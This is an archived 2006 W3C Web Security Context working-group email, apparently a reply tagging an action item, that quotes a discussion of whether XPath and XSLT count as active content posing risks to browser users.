Re: XPath/XQuery and all that from Thomas Roessler on 2006-11-14 (public-wsc-wg@w3.org from November 2006)

From: Thomas Roessler <tlr@w3.org>
Date: Tue, 14 Nov 2006 15:25:50 -0500
To: "Michael(tm) Smith" <mikes@opera.com>
Cc: public-wsc-wg@w3.org
Message-ID: <20061114202550.GS2298@raktajino.does-not-exist.org>

(This referred to ACTION-3.  Please make sure you do quote the
action identifier when responding.)
-- 
Thomas Roessler, W3C  <tlr@w3.org>






On 2006-11-15 05:23:01 +0900, Michael(tm) Smith wrote:
> From: "Michael(tm) Smith" <mikes@opera.com>
> To: public-wsc-wg@w3.org
> Date: Wed, 15 Nov 2006 05:23:01 +0900
> Subject: Re: XPath/XQuery and all that
> List-Id: <public-wsc-wg.w3.org>
> X-Spam-Level: 
> X-Archived-At: http://www.w3.org/mid/20061114202300.GI4446@malware
> 
> Stephen Farrell <stephen.farrell@cs.tcd.ie>, 2006-11-14 19:28 +0000:
> 
> > XPath and similar languages are effectively almost programming
> > languages and can therefore potentially badly affect the end
> > user.
> 
> How, exactly? XPath itself is an just an addressing mechanism.
> that can be used by other languages (such as XSLT). It's not, on
> its own, a Turing-complete programming language as Javascript is.
> 
> I know there are security considerations around XSLT, which has
> a document() function and xsl:import and xsl:include elements
> (which all can potentially enable an XSLT stylesheet to load a
> document from an arbitrary URI).
> 
> > In contrast with Java/Javascript these are less likely
> > to have separate content types or browser settings/controls
> > that the user can set and understand.
> 
> True. There is no "Disable XPath" option in any browser that I
> know of. I think there may not even be a "Disable XSLT" option in
> any of the browser that have XSLT support.
> 
> > I don't claim to know the answer, but the question relates to
> > these examples of sort-of-active content - should WSC consider
> > these in the same way as Java/Javascript or not? And either way,
> > what's the boundary between passive and active content? (I
> > assume we'll need some description of "active" content that
> > users have to be more careful about.)
> > 
> > These technologies may also be worth considering if we think
> > of the user's machine a a DDoS attack vector. (Attack web
> > server, modify content to include dodgy XPath expressions that
> > attack someone. Innocent browsers rip away.)
> 
> Can you give a specific example of a dodgy XPath expression and
> how it might be used to do something malicious.
> 
>   --Mike
> 
> -- 
> Michael(tm) Smith
> Opera Software, Tokyo
> xmpp:smith@sideshowbarker.net
> irc://irc.freenode.net/mobile-web

Received on Tuesday, 14 November 2006 20:26:00 UTC